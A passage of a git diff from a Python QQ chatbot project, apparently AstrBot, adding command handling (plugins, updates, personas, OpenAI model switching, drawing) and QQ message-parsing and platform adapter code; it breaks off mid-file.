# 指令功能的基类,通用的(不区分语言模型)的指令就在这实现
|
||||
|
||||
|
||||
class Command:
|
||||
def __init__(self, provider: Provider, global_object: GlobalObject = None):
|
||||
self.provider = provider
|
||||
self.global_object = global_object
|
||||
|
||||
async def check_command(self,
|
||||
message,
|
||||
session_id: str,
|
||||
role: str,
|
||||
platform: RegisteredPlatform,
|
||||
message_obj):
|
||||
self.platform = platform
|
||||
# 插件
|
||||
cached_plugins = self.global_object.cached_plugins
|
||||
# 将消息封装成 AstrMessageEvent 对象
|
||||
ame = AstrMessageEvent(
|
||||
message_str=message,
|
||||
message_obj=message_obj,
|
||||
platform=platform,
|
||||
role=role,
|
||||
context=self.global_object,
|
||||
session_id=session_id
|
||||
)
|
||||
# 从已启动的插件中查找是否有匹配的指令
|
||||
for plugin in cached_plugins:
|
||||
# 过滤掉平台类插件
|
||||
if plugin.metadata.plugin_type == PluginType.PLATFORM:
|
||||
continue
|
||||
try:
|
||||
if inspect.iscoroutinefunction(plugin.plugin_instance.run):
|
||||
result = await plugin.plugin_instance.run(ame)
|
||||
else:
|
||||
result = await asyncio.to_thread(plugin.plugin_instance.run, ame)
|
||||
if isinstance(result, CommandResult):
|
||||
hit = result.hit
|
||||
res = result._result_tuple()
|
||||
elif isinstance(result, tuple):
|
||||
hit = result[0]
|
||||
res = result[1]
|
||||
else:
|
||||
raise TypeError("插件返回值格式错误。")
|
||||
if hit:
|
||||
logger.debug("hit plugin: " + plugin.metadata.plugin_name)
|
||||
return True, res
|
||||
except TypeError as e:
|
||||
# 参数不匹配,尝试使用旧的参数方案
|
||||
try:
|
||||
if inspect.iscoroutinefunction(plugin.plugin_instance.run):
|
||||
hit, res = await plugin.plugin_instance.run(message, role, platform, message_obj, self.global_object.platform_qq)
|
||||
else:
|
||||
hit, res = await asyncio.to_thread(plugin.plugin_instance.run, message, role, platform, message_obj, self.global_object.platform_qq)
|
||||
if hit:
|
||||
return True, res
|
||||
except BaseException as e:
|
||||
logger.error(
|
||||
f"{plugin.metadata.plugin_name} 插件异常,原因: {str(e)}\n如果你没有相关装插件的想法, 请直接忽略此报错, 不影响其他功能的运行。")
|
||||
except BaseException as e:
|
||||
logger.error(
|
||||
f"{plugin.metadata.plugin_name} 插件异常,原因: {str(e)}\n如果你没有相关装插件的想法, 请直接忽略此报错, 不影响其他功能的运行。")
|
||||
|
||||
if self.command_start_with(message, "nick"):
|
||||
return True, self.set_nick(message, platform, role)
|
||||
if self.command_start_with(message, "plugin"):
|
||||
return True, self.plugin_oper(message, role, cached_plugins, platform)
|
||||
if self.command_start_with(message, "myid") or self.command_start_with(message, "!myid"):
|
||||
return True, self.get_my_id(message_obj, platform)
|
||||
if self.command_start_with(message, "web"): # 网页搜索
|
||||
return True, self.web_search(message)
|
||||
if self.command_start_with(message, "update"):
|
||||
return True, self.update(message, role)
|
||||
if not self.provider and self.command_start_with(message, "help"):
|
||||
return True, await self.help()
|
||||
|
||||
return False, None
|
||||
|
||||
def web_search(self, message):
|
||||
l = message.split(' ')
|
||||
if len(l) == 1:
|
||||
return True, f"网页搜索功能当前状态: {self.global_object.web_search}", "web"
|
||||
elif l[1] == 'on':
|
||||
self.global_object.web_search = True
|
||||
return True, "已开启网页搜索", "web"
|
||||
elif l[1] == 'off':
|
||||
self.global_object.web_search = False
|
||||
return True, "已关闭网页搜索", "web"
|
||||
|
||||
def get_my_id(self, message_obj, platform):
|
||||
try:
|
||||
user_id = str(message_obj.user_id)
|
||||
return True, f"你在此平台上的ID:{user_id}", "plugin"
|
||||
except BaseException as e:
|
||||
return False, f"在{platform}上获取你的ID失败,原因: {str(e)}", "plugin"
|
||||
|
||||
def get_new_conf(self, message, role):
|
||||
if role != "admin":
|
||||
return False, f"你的身份组{role}没有权限使用此指令。", "newconf"
|
||||
l = message.split(" ")
|
||||
if len(l) <= 1:
|
||||
obj = cc.get_all()
|
||||
p = gu.create_text_image("【cmd_config.json】", json.dumps(
|
||||
obj, indent=4, ensure_ascii=False))
|
||||
return True, [Image.fromFileSystem(p)], "newconf"
|
||||
|
||||
'''
|
||||
插件指令
|
||||
'''
|
||||
|
||||
def plugin_oper(self, message: str, role: str, cached_plugins: List[RegisteredPlugin], platform: str):
|
||||
l = message.split(" ")
|
||||
if len(l) < 2:
|
||||
p = gu.create_text_image(
|
||||
"【插件指令面板】", "安装插件: \nplugin i 插件Github地址\n卸载插件: \nplugin d 插件名 \n重载插件: \nplugin reload\n查看插件列表:\nplugin l\n更新插件: plugin u 插件名\n")
|
||||
return True, [Image.fromFileSystem(p)], "plugin"
|
||||
else:
|
||||
if l[1] == "i":
|
||||
if role != "admin":
|
||||
return False, f"你的身份组{role}没有权限安装插件", "plugin"
|
||||
try:
|
||||
putil.install_plugin(l[2], cached_plugins)
|
||||
return True, "插件拉取并载入成功~", "plugin"
|
||||
except BaseException as e:
|
||||
return False, f"拉取插件失败,原因: {str(e)}", "plugin"
|
||||
elif l[1] == "d":
|
||||
if role != "admin":
|
||||
return False, f"你的身份组{role}没有权限删除插件", "plugin"
|
||||
try:
|
||||
putil.uninstall_plugin(l[2], cached_plugins)
|
||||
return True, "插件卸载成功~", "plugin"
|
||||
except BaseException as e:
|
||||
return False, f"卸载插件失败,原因: {str(e)}", "plugin"
|
||||
elif l[1] == "u":
|
||||
try:
|
||||
putil.update_plugin(l[2], cached_plugins)
|
||||
return True, "\n更新插件成功!!", "plugin"
|
||||
except BaseException as e:
|
||||
return False, f"更新插件失败,原因: {str(e)}。\n建议: 使用 plugin i 指令进行覆盖安装(插件数据可能会丢失)", "plugin"
|
||||
elif l[1] == "l":
|
||||
try:
|
||||
plugin_list_info = ""
|
||||
for plugin in cached_plugins:
|
||||
plugin_list_info += f"{plugin.metadata.plugin_name}: \n名称: {plugin.metadata.plugin_name}\n简介: {plugin.metadata.plugin_desc}\n版本: {plugin.metadata.version}\n作者: {plugin.metadata.author}\n"
|
||||
p = gu.create_text_image(
|
||||
"【已激活插件列表】", plugin_list_info + "\n使用plugin v 插件名 查看插件帮助\n")
|
||||
return True, [Image.fromFileSystem(p)], "plugin"
|
||||
except BaseException as e:
|
||||
return False, f"获取插件列表失败,原因: {str(e)}", "plugin"
|
||||
elif l[1] == "v":
|
||||
try:
|
||||
info = None
|
||||
for i in cached_plugins:
|
||||
if i.metadata.plugin_name == l[2]:
|
||||
info = i.metadata
|
||||
break
|
||||
if info:
|
||||
p = gu.create_text_image(
|
||||
f"【插件信息】", f"名称: {info.plugin_name}\n类型: {info.plugin_type}\n{info.desc}\n版本: {info.version}\n作者: {info.author}")
|
||||
return True, [Image.fromFileSystem(p)], "plugin"
|
||||
else:
|
||||
return False, "未找到该插件", "plugin"
|
||||
except BaseException as e:
|
||||
return False, f"获取插件信息失败,原因: {str(e)}", "plugin"
|
||||
|
||||
'''
|
||||
nick: 存储机器人的昵称
|
||||
'''
|
||||
|
||||
def set_nick(self, message: str, platform: RegisteredPlatform, role: str = "member"):
|
||||
if role != "admin":
|
||||
return True, "你无权使用该指令 :P", "nick"
|
||||
if str(platform) == PLATFORM_GOCQ:
|
||||
l = message.split(" ")
|
||||
if len(l) == 1:
|
||||
return True, "【设置机器人昵称】示例:\n支持多昵称\nnick 昵称1 昵称2 昵称3", "nick"
|
||||
nick = l[1:]
|
||||
cc.put("nick_qq", nick)
|
||||
self.global_object.nick = tuple(nick)
|
||||
return True, f"设置成功!现在你可以叫我这些昵称来提问我啦~", "nick"
|
||||
elif str(platform) == PLATFORM_QQCHAN:
|
||||
nick = message.split(" ")[2]
|
||||
return False, "QQ频道平台不支持为机器人设置昵称。", "nick"
|
||||
|
||||
def general_commands(self):
|
||||
return {
|
||||
"help": "帮助",
|
||||
"keyword": "设置关键词/关键指令回复",
|
||||
"update": "更新项目",
|
||||
"nick": "设置机器人昵称",
|
||||
"plugin": "插件安装、卸载和重载",
|
||||
"web on/off": "LLM 网页搜索能力",
|
||||
}
|
||||
|
||||
async def help_messager(self, commands: dict, platform: str, cached_plugins: List[RegisteredPlugin] = None):
|
||||
try:
|
||||
async with aiohttp.ClientSession() as session:
|
||||
async with session.get("https://soulter.top/channelbot/notice.json") as resp:
|
||||
notice = (await resp.json())["notice"]
|
||||
except BaseException as e:
|
||||
notice = ""
|
||||
msg = "# Help Center\n## 指令列表\n"
|
||||
for key, value in commands.items():
|
||||
msg += f"`{key}` - {value}\n"
|
||||
# plugins
|
||||
if cached_plugins != None:
|
||||
plugin_list_info = ""
|
||||
for plugin in cached_plugins:
|
||||
plugin_list_info += f"`{plugin.metadata.plugin_name}` {plugin.metadata.desc}\n"
|
||||
if plugin_list_info.strip() != "":
|
||||
msg += "\n## 插件列表\n> 使用plugin v 插件名 查看插件帮助\n"
|
||||
msg += plugin_list_info
|
||||
msg += notice
|
||||
|
||||
try:
|
||||
p = gu.create_markdown_image(msg)
|
||||
return [Image.fromFileSystem(p),]
|
||||
except BaseException as e:
|
||||
logger.error(str(e))
|
||||
return msg
|
||||
|
||||
def command_start_with(self, message: str, *args):
|
||||
'''
|
||||
当消息以指定的指令开头时返回True
|
||||
'''
|
||||
for arg in args:
|
||||
if message.startswith(arg) or message.startswith('/'+arg):
|
||||
return True
|
||||
return False
|
||||
|
||||
def update(self, message: str, role: str):
|
||||
if role != "admin":
|
||||
return True, "你没有权限使用该指令", "update"
|
||||
l = message.split(" ")
|
||||
if len(l) == 1:
|
||||
try:
|
||||
update_info = util.updator.check_update()
|
||||
update_info += "\nTips:\n输入「update latest」更新到最新版本\n输入「update <版本号如v3.1.3>」切换到指定版本\n输入「update r」重启机器人\n"
|
||||
return True, update_info, "update"
|
||||
except BaseException as e:
|
||||
return False, "检查更新失败: "+str(e), "update"
|
||||
else:
|
||||
if l[1] == "latest":
|
||||
try:
|
||||
release_data = util.updator.request_release_info()
|
||||
util.updator.update_project(release_data)
|
||||
return True, "更新成功,重启生效。可输入「update r」重启", "update"
|
||||
except BaseException as e:
|
||||
return False, "更新失败: "+str(e), "update"
|
||||
elif l[1] == "r":
|
||||
util.updator._reboot()
|
||||
else:
|
||||
if l[1].lower().startswith('v'):
|
||||
try:
|
||||
release_data = util.updator.request_release_info(
|
||||
latest=False)
|
||||
util.updator.update_project(
|
||||
release_data, latest=False, version=l[1])
|
||||
return True, "更新成功,重启生效。可输入「update r」重启", "update"
|
||||
except BaseException as e:
|
||||
return False, "更新失败: "+str(e), "update"
|
||||
else:
|
||||
return False, "版本号格式错误", "update"
|
||||
|
||||
def reset(self):
|
||||
return False
|
||||
|
||||
def set(self):
|
||||
return False
|
||||
|
||||
def unset(self):
|
||||
return False
|
||||
|
||||
def key(self):
|
||||
return False
|
||||
|
||||
async def help(self):
|
||||
ret = await self.help_messager(self.general_commands(), self.platform, self.global_object.cached_plugins)
|
||||
return True, ret, "help"
|
||||
|
||||
def status(self):
|
||||
return False
|
||||
|
||||
def token(self):
|
||||
return False
|
||||
|
||||
def his(self):
|
||||
return False
|
||||
|
||||
def draw(self):
|
||||
return False
|
||||
256
model/command/openai_official.py
Normal file
@@ -0,0 +1,256 @@
|
||||
from model.command.command import Command
|
||||
from model.provider.openai_official import ProviderOpenAIOfficial, MODELS
|
||||
from util.personality import personalities
|
||||
from type.types import GlobalObject
|
||||
from type.command import CommandItem
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from openai._exceptions import NotFoundError
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
class CommandOpenAIOfficial(Command):
|
||||
def __init__(self, provider: ProviderOpenAIOfficial, global_object: GlobalObject):
|
||||
self.provider = provider
|
||||
self.global_object = global_object
|
||||
self.personality_str = ""
|
||||
self.commands = [
|
||||
CommandItem("reset", self.reset, "重置 LLM 会话。", "内置"),
|
||||
CommandItem("his", self.his, "查看与 LLM 的历史记录。", "内置"),
|
||||
CommandItem("status", self.status, "查看 GPT 配置信息和用量状态。", "内置"),
|
||||
]
|
||||
super().__init__(provider, global_object)
|
||||
|
||||
async def check_command(self,
|
||||
message: str,
|
||||
session_id: str,
|
||||
role: str,
|
||||
platform: str,
|
||||
message_obj):
|
||||
self.platform = platform
|
||||
|
||||
# 检查基础指令
|
||||
hit, res = await super().check_command(
|
||||
message,
|
||||
session_id,
|
||||
role,
|
||||
platform,
|
||||
message_obj
|
||||
)
|
||||
|
||||
logger.debug(f"基础指令hit: {hit}, res: {res}")
|
||||
|
||||
# 这里是这个 LLM 的专属指令
|
||||
if hit:
|
||||
return True, res
|
||||
if self.command_start_with(message, "reset", "重置"):
|
||||
return True, await self.reset(session_id, message)
|
||||
elif self.command_start_with(message, "his", "历史"):
|
||||
return True, self.his(message, session_id)
|
||||
elif self.command_start_with(message, "status"):
|
||||
return True, self.status(session_id)
|
||||
elif self.command_start_with(message, "help", "帮助"):
|
||||
return True, await self.help()
|
||||
elif self.command_start_with(message, "unset"):
|
||||
return True, self.unset(session_id)
|
||||
elif self.command_start_with(message, "set"):
|
||||
return True, self.set(message, session_id)
|
||||
elif self.command_start_with(message, "update"):
|
||||
return True, self.update(message, role)
|
||||
elif self.command_start_with(message, "画", "draw"):
|
||||
return True, await self.draw(message)
|
||||
elif self.command_start_with(message, "switch"):
|
||||
return True, await self.switch(message)
|
||||
elif self.command_start_with(message, "models"):
|
||||
return True, await self.print_models()
|
||||
elif self.command_start_with(message, "model"):
|
||||
return True, await self.set_model(message)
|
||||
return False, None
|
||||
|
||||
async def get_models(self):
|
||||
try:
|
||||
models = await self.provider.client.models.list()
|
||||
except NotFoundError as e:
|
||||
bu = str(self.provider.client.base_url)
|
||||
self.provider.client.base_url = bu + "/v1"
|
||||
models = await self.provider.client.models.list()
|
||||
finally:
|
||||
return filter(lambda x: x.id.startswith("gpt"), models.data)
|
||||
|
||||
async def print_models(self):
|
||||
models = await self.get_models()
|
||||
i = 1
|
||||
ret = "OpenAI GPT 类可用模型"
|
||||
for model in models:
|
||||
ret += f"\n{i}. {model.id}"
|
||||
i += 1
|
||||
logger.debug(ret)
|
||||
return True, ret, "models"
|
||||
|
||||
|
||||
async def set_model(self, message: str):
|
||||
l = message.split(" ")
|
||||
if len(l) == 1:
|
||||
return True, "请输入 /model 模型名/编号", "model"
|
||||
model = str(l[1])
|
||||
models = await self.get_models()
|
||||
models = list(models)
|
||||
if model.isdigit() and int(model) <= len(models) and int(model) >= 1:
|
||||
model = models[int(model)-1]
|
||||
else:
|
||||
f = False
|
||||
for m in models:
|
||||
if model == m.id:
|
||||
f = True
|
||||
break
|
||||
if not f:
|
||||
return True, "模型不存在或输入非法", "model"
|
||||
|
||||
self.provider.set_model(model.id)
|
||||
return True, f"模型已设置为 {model.id}", "model"
|
||||
|
||||
|
||||
async def help(self):
|
||||
commands = super().general_commands()
|
||||
commands['画'] = '调用 OpenAI DallE 模型生成图片'
|
||||
commands['set'] = '人格设置面板'
|
||||
commands['status'] = '查看 Api Key 状态和配置信息'
|
||||
commands['token'] = '查看本轮会话 token'
|
||||
commands['reset'] = '重置当前与 LLM 的会话,但保留人格(system prompt)'
|
||||
commands['reset p'] = '重置当前与 LLM 的会话,并清除人格。'
|
||||
|
||||
return True, await super().help_messager(commands, self.platform, self.global_object.cached_plugins), "help"
|
||||
|
||||
async def reset(self, session_id: str, message: str = "reset"):
|
||||
if self.provider is None:
|
||||
return False, "未启用 OpenAI 官方 API", "reset"
|
||||
l = message.split(" ")
|
||||
if len(l) == 1:
|
||||
await self.provider.forget(session_id, keep_system_prompt=True)
|
||||
return True, "重置成功", "reset"
|
||||
if len(l) == 2 and l[1] == "p":
|
||||
await self.provider.forget(session_id)
|
||||
|
||||
def his(self, message: str, session_id: str):
|
||||
if self.provider is None:
|
||||
return False, "未启用 OpenAI 官方 API", "his"
|
||||
size_per_page = 3
|
||||
page = 1
|
||||
l = message.split(" ")
|
||||
if len(l) == 2:
|
||||
try:
|
||||
page = int(l[1])
|
||||
except BaseException as e:
|
||||
return True, "页码不合法", "his"
|
||||
contexts, total_num = self.provider.dump_contexts_page(session_id, size_per_page, page=page)
|
||||
t_pages = total_num // size_per_page + 1
|
||||
return True, f"历史记录如下:\n{contexts}\n第 {page} 页 | 共 {t_pages} 页\n*输入 /his 2 跳转到第 2 页", "his"
|
||||
|
||||
def status(self, session_id: str):
|
||||
if self.provider is None:
|
||||
return False, "未启用 OpenAI 官方 API", "status"
|
||||
keys_data = self.provider.get_keys_data()
|
||||
ret = "OpenAI Key"
|
||||
for k in keys_data:
|
||||
status = "🟢" if keys_data[k] else "🔴"
|
||||
ret += "\n|- " + k[:8] + " " + status
|
||||
|
||||
conf = self.provider.get_configs()
|
||||
ret += "\n当前模型:" + conf['model']
|
||||
if conf['model'] in MODELS:
|
||||
ret += "\n最大上下文窗口:" + str(MODELS[conf['model']]) + " tokens"
|
||||
|
||||
if session_id in self.provider.session_memory and len(self.provider.session_memory[session_id]):
|
||||
ret += "\n你的会话上下文:" + str(self.provider.session_memory[session_id][-1]['usage_tokens']) + " tokens"
|
||||
|
||||
return True, ret, "status"
|
||||
|
||||
async def switch(self, message: str):
|
||||
'''
|
||||
切换账号
|
||||
'''
|
||||
l = message.split(" ")
|
||||
if len(l) == 1:
|
||||
_, ret, _ = self.status()
|
||||
curr_ = self.provider.get_curr_key()
|
||||
if curr_ is None:
|
||||
ret += "当前您未选择账号。输入/switch <账号序号>切换账号。"
|
||||
else:
|
||||
ret += f"当前您选择的账号为:{curr_[-8:]}。输入/switch <账号序号>切换账号。"
|
||||
return True, ret, "switch"
|
||||
elif len(l) == 2:
|
||||
try:
|
||||
key_stat = self.provider.get_keys_data()
|
||||
index = int(l[1])
|
||||
if index > len(key_stat) or index < 1:
|
||||
return True, "账号序号不合法。", "switch"
|
||||
else:
|
||||
try:
|
||||
new_key = list(key_stat.keys())[index-1]
|
||||
self.provider.set_key(new_key)
|
||||
except BaseException as e:
|
||||
return True, "账号切换失败,原因: " + str(e), "switch"
|
||||
return True, f"账号切换成功。", "switch"
|
||||
except BaseException as e:
|
||||
return True, "未知错误: "+str(e), "switch"
|
||||
else:
|
||||
return True, "参数过多。", "switch"
|
||||
|
||||
def unset(self, session_id: str):
|
||||
if self.provider is None:
|
||||
return False, "未启用 OpenAI 官方 API", "unset"
|
||||
self.provider.curr_personality = {}
|
||||
self.provider.forget(session_id)
|
||||
return True, "已清除人格并重置历史记录。", "unset"
|
||||
|
||||
def set(self, message: str, session_id: str):
|
||||
if self.provider is None:
|
||||
return False, "未启用 OpenAI 官方 API", "set"
|
||||
l = message.split(" ")
|
||||
if len(l) == 1:
|
||||
return True, f"【人格文本由PlexPt开源项目awesome-chatgpt-pr \
|
||||
ompts-zh提供】\n设置人格: \n/set 人格名。例如/set 编剧\n人格列表: /set list\n人格详细信息: \
|
||||
/set view 人格名\n自定义人格: /set 人格文本\n重置会话(清除人格): /reset\n重置会话(保留人格): /reset p\n【当前人格】: {str(self.provider.curr_personality)}", "set"
|
||||
elif l[1] == "list":
|
||||
msg = "人格列表:\n"
|
||||
for key in personalities.keys():
|
||||
msg += f" |-{key}\n"
|
||||
msg += '\n\n*输入/set view 人格名查看人格详细信息'
|
||||
msg += '\n*不定时更新人格库,请及时更新本项目。'
|
||||
return True, msg, "set"
|
||||
elif l[1] == "view":
|
||||
if len(l) == 2:
|
||||
return True, "请输入/set view 人格名", "set"
|
||||
ps = l[2].strip()
|
||||
if ps in personalities:
|
||||
msg = f"人格{ps}的详细信息:\n"
|
||||
msg += f"{personalities[ps]}\n"
|
||||
else:
|
||||
msg = f"人格{ps}不存在"
|
||||
return True, msg, "set"
|
||||
else:
|
||||
ps = l[1].strip()
|
||||
if ps in personalities:
|
||||
self.provider.curr_personality = {
|
||||
'name': ps,
|
||||
'prompt': personalities[ps]
|
||||
}
|
||||
self.provider.personality_set(ps, session_id)
|
||||
return True, f"人格{ps}已设置。", "set"
|
||||
else:
|
||||
self.provider.curr_personality = {
|
||||
'name': '自定义人格',
|
||||
'prompt': ps
|
||||
}
|
||||
self.provider.personality_set(ps, session_id)
|
||||
return True, f"自定义人格已设置。 \n人格信息: {ps}", "set"
|
||||
|
||||
async def draw(self, message: str):
|
||||
if self.provider is None:
|
||||
return False, "未启用 OpenAI 官方 API", "draw"
|
||||
if message.startswith("/画"):
|
||||
message = message[2:]
|
||||
elif message.startswith("画"):
|
||||
message = message[1:]
|
||||
img_url = await self.provider.image_generate(message)
|
||||
return True, img_url, "draw"
|
||||
110
model/platform/_message_parse.py
Normal file
@@ -0,0 +1,110 @@
|
||||
from nakuru.entities.components import Plain, At, Image, BaseMessageComponent
|
||||
from nakuru import (
|
||||
GuildMessage,
|
||||
GroupMessage,
|
||||
FriendMessage
|
||||
)
|
||||
import botpy.message
|
||||
from type.message import *
|
||||
from typing import List, Union
|
||||
import time
|
||||
|
||||
# QQ官方消息类型转换
|
||||
|
||||
|
||||
def qq_official_message_parse(message: List[BaseMessageComponent]):
|
||||
plain_text = ""
|
||||
image_path = None # only one img supported
|
||||
for i in message:
|
||||
if isinstance(i, Plain):
|
||||
plain_text += i.text
|
||||
elif isinstance(i, Image) and image_path == None:
|
||||
if i.path is not None:
|
||||
image_path = i.path
|
||||
else:
|
||||
image_path = i.file
|
||||
return plain_text, image_path
|
||||
|
||||
# QQ官方消息类型 2 AstrBotMessage
|
||||
|
||||
|
||||
def qq_official_message_parse_rev(message: Union[botpy.message.Message, botpy.message.GroupMessage],
|
||||
message_type: MessageType) -> AstrBotMessage:
|
||||
abm = AstrBotMessage()
|
||||
abm.type = message_type
|
||||
abm.timestamp = int(time.time())
|
||||
abm.raw_message = message
|
||||
abm.message_id = message.id
|
||||
abm.tag = "qqchan"
|
||||
msg: List[BaseMessageComponent] = []
|
||||
|
||||
if message_type == MessageType.GROUP_MESSAGE:
|
||||
abm.sender = MessageMember(
|
||||
message.author.member_openid,
|
||||
""
|
||||
)
|
||||
abm.message_str = message.content.strip()
|
||||
abm.self_id = "unknown_selfid"
|
||||
|
||||
msg.append(Plain(abm.message_str))
|
||||
if message.attachments:
|
||||
for i in message.attachments:
|
||||
if i.content_type.startswith("image"):
|
||||
url = i.url
|
||||
if not url.startswith("http"):
|
||||
url = "https://"+url
|
||||
img = Image.fromURL(url)
|
||||
msg.append(img)
|
||||
abm.message = msg
|
||||
|
||||
elif message_type == MessageType.GUILD_MESSAGE or message_type == MessageType.FRIEND_MESSAGE:
|
||||
# 目前对于 FRIEND_MESSAGE 只处理频道私聊
|
||||
try:
|
||||
abm.self_id = str(message.mentions[0].id)
|
||||
except:
|
||||
abm.self_id = ""
|
||||
|
||||
plain_content = message.content.replace(
|
||||
"<@!"+str(abm.self_id)+">", "").strip()
|
||||
msg.append(Plain(plain_content))
|
||||
if message.attachments:
|
||||
for i in message.attachments:
|
||||
if i.content_type.startswith("image"):
|
||||
url = i.url
|
||||
if not url.startswith("http"):
|
||||
url = "https://"+url
|
||||
img = Image.fromURL(url)
|
||||
msg.append(img)
|
||||
abm.message = msg
|
||||
abm.message_str = plain_content
|
||||
abm.sender = MessageMember(
|
||||
str(message.author.id),
|
||||
str(message.author.username)
|
||||
)
|
||||
else:
|
||||
raise ValueError(f"Unknown message type: {message_type}")
|
||||
return abm
|
||||
|
||||
|
||||
def nakuru_message_parse_rev(message: Union[GuildMessage, GroupMessage, FriendMessage]) -> AstrBotMessage:
|
||||
abm = AstrBotMessage()
|
||||
abm.type = MessageType(message.type)
|
||||
abm.timestamp = int(time.time())
|
||||
abm.raw_message = message
|
||||
abm.message_id = message.message_id
|
||||
|
||||
plain_content = ""
|
||||
for i in message.message:
|
||||
if isinstance(i, Plain):
|
||||
plain_content += i.text
|
||||
abm.message_str = plain_content
|
||||
|
||||
abm.self_id = str(message.self_id)
|
||||
abm.sender = MessageMember(
|
||||
str(message.sender.user_id),
|
||||
str(message.sender.nickname)
|
||||
)
|
||||
abm.tag = "gocq"
|
||||
abm.message = message.message
|
||||
|
||||
return abm
|
||||
9
model/platform/_message_result.py
Normal file
@@ -0,0 +1,9 @@
|
||||
from dataclasses import dataclass
|
||||
from typing import Union, Optional
|
||||
|
||||
|
||||
@dataclass
|
||||
class MessageResult():
|
||||
result_message: Union[str, list]
|
||||
is_command_call: Optional[bool] = False
|
||||
callback: Optional[callable] = None
|
||||
67
model/platform/_platfrom.py
Normal file
@@ -0,0 +1,67 @@
|
||||
import abc
|
||||
from typing import Union
|
||||
from nakuru import (
|
||||
GuildMessage,
|
||||
GroupMessage,
|
||||
FriendMessage,
|
||||
)
|
||||
from nakuru.entities.components import Plain, At, Image
|
||||
|
||||
|
||||
class Platform():
|
||||
def __init__(self, message_handler: callable) -> None:
|
||||
'''
|
||||
初始化平台的各种接口
|
||||
'''
|
||||
self.message_handler = message_handler
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def handle_msg():
|
||||
'''
|
||||
处理到来的消息
|
||||
'''
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def reply_msg():
|
||||
'''
|
||||
回复消息(被动发送)
|
||||
'''
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def send_msg(target: Union[GuildMessage, GroupMessage, FriendMessage, str], message: Union[str, list]):
|
||||
'''
|
||||
发送消息(主动发送)
|
||||
'''
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def send(target: Union[GuildMessage, GroupMessage, FriendMessage, str], message: Union[str, list]):
|
||||
'''
|
||||
发送消息(主动发送)同 send_msg()
|
||||
'''
|
||||
pass
|
||||
|
||||
def parse_message_outline(self, message: Union[GuildMessage, GroupMessage, FriendMessage, str, list]) -> str:
|
||||
'''
|
||||
将消息解析成大纲消息形式。
|
||||
如: xxxxx[图片]xxxxx
|
||||
'''
|
||||
if isinstance(message, str):
|
||||
return message
|
||||
ret = ''
|
||||
ls_to_parse = message if isinstance(message, list) else message.message
|
||||
try:
|
||||
for node in ls_to_parse:
|
||||
if isinstance(node, Plain):
|
||||
ret += node.text
|
||||
elif isinstance(node, At):
|
||||
ret += f'[At: {node.name}/{node.qq}]'
|
||||
elif isinstance(node, Image):
|
||||
ret += '[图片]'
|
||||
except Exception as e:
|
||||
pass
|
||||
ret.replace('\n', '')
|
||||
return ret
|
||||
320
model/platform/qq_gocq.py
Normal file
@@ -0,0 +1,320 @@
|
||||
from nakuru.entities.components import Plain, At, Image, Node
|
||||
from util import general_utils as gu
|
||||
from util.cmd_config import CmdConfig
|
||||
import asyncio
|
||||
from nakuru import (
|
||||
CQHTTP,
|
||||
GuildMessage,
|
||||
GroupMessage,
|
||||
FriendMessage,
|
||||
GroupMemberIncrease,
|
||||
Notify
|
||||
)
|
||||
from typing import Union
|
||||
import time
|
||||
|
||||
from ._platfrom import Platform
|
||||
from ._message_parse import nakuru_message_parse_rev
|
||||
from type.message import *
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
|
||||
class FakeSource:
|
||||
def __init__(self, type, group_id):
|
||||
self.type = type
|
||||
self.group_id = group_id
|
||||
|
||||
|
||||
class QQGOCQ(Platform):
|
||||
def __init__(self, cfg: dict, message_handler: callable, global_object) -> None:
|
||||
super().__init__(message_handler)
|
||||
|
||||
self.loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(self.loop)
|
||||
|
||||
self.waiting = {}
|
||||
self.cc = CmdConfig()
|
||||
self.cfg = cfg
|
||||
|
||||
try:
|
||||
self.nick_qq = cfg['nick_qq']
|
||||
except:
|
||||
self.nick_qq = ["ai", "!", "!"]
|
||||
nick_qq = self.nick_qq
|
||||
if isinstance(nick_qq, str):
|
||||
nick_qq = [nick_qq]
|
||||
|
||||
self.unique_session = cfg['uniqueSessionMode']
|
||||
self.pic_mode = cfg['qq_pic_mode']
|
||||
|
||||
self.client = CQHTTP(
|
||||
host=self.cc.get("gocq_host", "127.0.0.1"),
|
||||
port=self.cc.get("gocq_websocket_port", 6700),
|
||||
http_port=self.cc.get("gocq_http_port", 5700),
|
||||
)
|
||||
gocq_app = self.client
|
||||
|
||||
self.announcement = self.cc.get("announcement", "欢迎新人!")
|
||||
|
||||
@gocq_app.receiver("GroupMessage")
|
||||
async def _(app: CQHTTP, source: GroupMessage):
|
||||
if self.cc.get("gocq_react_group", True):
|
||||
abm = nakuru_message_parse_rev(source)
|
||||
if isinstance(source.message[0], Plain):
|
||||
await self.handle_msg(abm)
|
||||
elif isinstance(source.message[0], At):
|
||||
if source.message[0].qq == source.self_id:
|
||||
await self.handle_msg(abm)
|
||||
else:
|
||||
return
|
||||
|
||||
@gocq_app.receiver("FriendMessage")
|
||||
async def _(app: CQHTTP, source: FriendMessage):
|
||||
if self.cc.get("gocq_react_friend", True):
|
||||
abm = nakuru_message_parse_rev(source)
|
||||
if isinstance(source.message[0], Plain):
|
||||
await self.handle_msg(abm)
|
||||
else:
|
||||
return
|
||||
|
||||
@gocq_app.receiver("GroupMemberIncrease")
|
||||
async def _(app: CQHTTP, source: GroupMemberIncrease):
|
||||
if self.cc.get("gocq_react_group_increase", True):
|
||||
await app.sendGroupMessage(source.group_id, [
|
||||
Plain(text=self.announcement)
|
||||
])
|
||||
|
||||
# @gocq_app.receiver("Notify")
|
||||
# async def _(app: CQHTTP, source: Notify):
|
||||
# print(source)
|
||||
# if source.sub_type == "poke" and source.target_id == source.self_id:
|
||||
# await self.handle_msg(source)
|
||||
|
||||
@gocq_app.receiver("GuildMessage")
|
||||
async def _(app: CQHTTP, source: GuildMessage):
|
||||
if self.cc.get("gocq_react_guild", True):
|
||||
abm = nakuru_message_parse_rev(source)
|
||||
if isinstance(source.message[0], Plain):
|
||||
await self.handle_msg(abm)
|
||||
elif isinstance(source.message[0], At):
|
||||
